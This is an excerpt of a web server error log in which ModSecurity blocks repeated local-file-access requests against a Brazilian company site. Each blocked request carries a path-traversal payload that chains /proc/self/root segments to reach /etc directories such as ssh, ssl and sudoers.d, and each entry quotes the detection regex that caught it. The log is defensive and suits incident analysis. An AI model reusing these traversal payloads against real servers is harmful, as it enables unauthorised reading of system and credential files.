"abiqHkr9dMAiw-8KANN7pAAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:11:13.137857 2026] [proxy_fcgi:error] [pid 29507:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:45450] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:11:15.529767 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:50768] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqM9SswJuvopo3lOiTrwAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:11:34.130170 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:45954] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:11:36.081603 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.243.203:43002] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqSKTCbgAP5jq5TehdcAAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:11:36.749504 2026] [:error] [pid 29802:tid 140411641214720] [client 74.7.241.46:38382] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqSM_BxrYCr4hPDw8dAAAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:11:37.236689 2026] [:error] [pid 29802:tid 140411649607424] [client 74.7.241.46:38382] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqSc_BxrYCr4hPDw8dAQAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:11:37.827397 2026] [:error] [pid 29507:tid 140411590858496] [client 74.7.243.203:55296] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqSUr9dMAiw-8KANN7qwAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:11:54.835230 2026] [:error] [pid 29802:tid 140411632822016] [client 74.7.241.46:41106] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqWs_BxrYCr4hPDw8dBAAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:11:55.154316 2026] [proxy_fcgi:error] [pid 10772:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46518] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:11:56.138411 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:41108] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqXLysWC90G-1nBrB2mQAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:11:56.670234 2026] [:error] [pid 29507:tid 140411725141760] [client 74.7.243.203:37850] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqXEr9dMAiw-8KANN7rgAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:11:57.663596 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.241.46:41114] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqXY6lpbStxTqkSkuYMwAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:11:58.854032 2026] [:error] [pid 15568:tid 140411624429312] [client 74.7.241.46:59338] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqXqQpVkWug9HeOt9j0wAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:12:00.039561 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.241.46:59342] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqYLABkC4fWIHEf8EvPwAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:12:16.417813 2026] [proxy_fcgi:error] [pid 15061:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47070] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:12:18.185166 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.241.46:42494] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqcv9ocpUE4ed4uDwn_QAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:12:19.259828 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.243.203:37852] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqc46lpbStxTqkSkuYOgAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:12:19.446571 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:42498] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqc_9ocpUE4ed4uDwoAAAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:12:21.787422 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.243.203:56208] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqdY6lpbStxTqkSkuYPgAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:12:38.121882 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:47694] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:12:40.331416 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.243.203:54030] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqiP9ocpUE4ed4uDwoFQAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:12:40.331439 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.241.46:42514] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqiNSswJuvopo3lOiTtgAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:12:41.635289 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:54828] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqidSswJuvopo3lOiTtwAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:12:42.378875 2026] [:error] [pid 14895:tid 140411658000128] [client 74.7.241.46:57544] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqilajLEzk2WiQ-11FvQAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:12:43.675343 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.241.46:57556] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqi6QpVkWug9HeOt9j1wAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:12:59.121830 2026] [proxy_fcgi:error] [pid 10831:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:48176] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:13:01.283073 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.241.46:58856] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqndSswJuvopo3lOiTuwAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
